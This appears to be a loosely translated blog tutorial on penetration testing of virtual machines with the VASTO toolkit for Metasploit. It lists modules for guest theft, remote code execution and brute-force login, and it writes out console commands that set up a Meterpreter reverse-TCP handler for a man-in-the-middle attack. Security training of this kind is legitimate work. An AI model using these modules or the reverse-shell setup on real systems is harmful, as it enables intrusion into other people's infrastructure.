Penetration Testing for virtual machines

Nowadays, virtualization is applied more and more in various enterprises, and the hot cloud computing also relies on this technology. Virtualization technology can make the use of physical resources more flexible and convenient. What is the security of virtual machines? Is it as safe as the traditional architecture?
What is virtualization?

Virtualization means that computer components run on a virtual basis rather than on a real basis. Virtualization Technology can expand the hardware capacity and simplify the software reconfiguration process. The virtualization technology of CPU allows a single CPU to simulate multiple CPUs in parallel, allowing a platform to run multiple operating systems at the same time, and applications can run in mutually independent spaces without affecting each other, this significantly improves the efficiency of the computer.

Let's take a look at the virtual machine hierarchy

The Virtual Machine is completely independent of its underlying physical hardware. For example, you can configure virtual components (such as CPU, Nic, and SCSI Controller) that are completely different from physical components on the underlying hardware ). Each virtual machine on the same physical server can even run different types of operating systems (Windows, Linux, etc)
Penetration Testing for virtual machines
VASTO is a dedicated virtual machine penetration testing tool that supports VMware, Oracle, and Xen. It can be well integrated with Metasploit. The official VASTO website is http://vasto.nibblesec.org/, and the latest version is v0.4 (not updated for a long time, it hurts)
Decompress the package before use, and then copy it in the metasploit folder.
The main modules of VASTO are as follows:

abiquo_guest_stealer – Abiquo guest stealer

abiquo_poison – Abiquo poison

eucalyptus_bouncer – Eucalyptus Bouncer

eucalyptus_poison – Eucalyptus Poison

oraclevm_oravma_fileread – Oracle VM agent remote code execution

vmware_autopwner – VMautopwn

vmware_guest_stealer – VMware Guest Stealer

vmware_login – VMware Login check scanner

vmware_session_rider – VMware Session Rider

vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution

vmware_updatemanager_traversal – Update manager path traversal

vmware_version – VMware products fingerprinter

vmware_vilurker – VIlurker VIclient attack

vmware_webaccess_portscan – VMware Web Access Relay Port Scanner

xen_login – Xen Login Check Scanner

oracle_oravma_exec – Oracle VM agent remote code execution

vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

vmware_tomcat_killer – VMware tomcat killer

Versionsscanner Modul: used to determine the VM version and other information.




Login Modul: This module can use the dictionary to try brute force Login to virtual machines

Vilurker module
This module uses ettercap to conduct man-in-the-middle attacks. After successful spoofing, a form will pop up when the client accesses the server. If it is clicked, A meterpreter will be rebounded.
Multi/handler listening first

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <Local Host IP here>

msf exploit(handler) > exploit

The spoofing process is as follows:

Return shell (meterpreter)



Reference
Http://www.s3cur1ty.de/vmware-attack-toolkit-vasto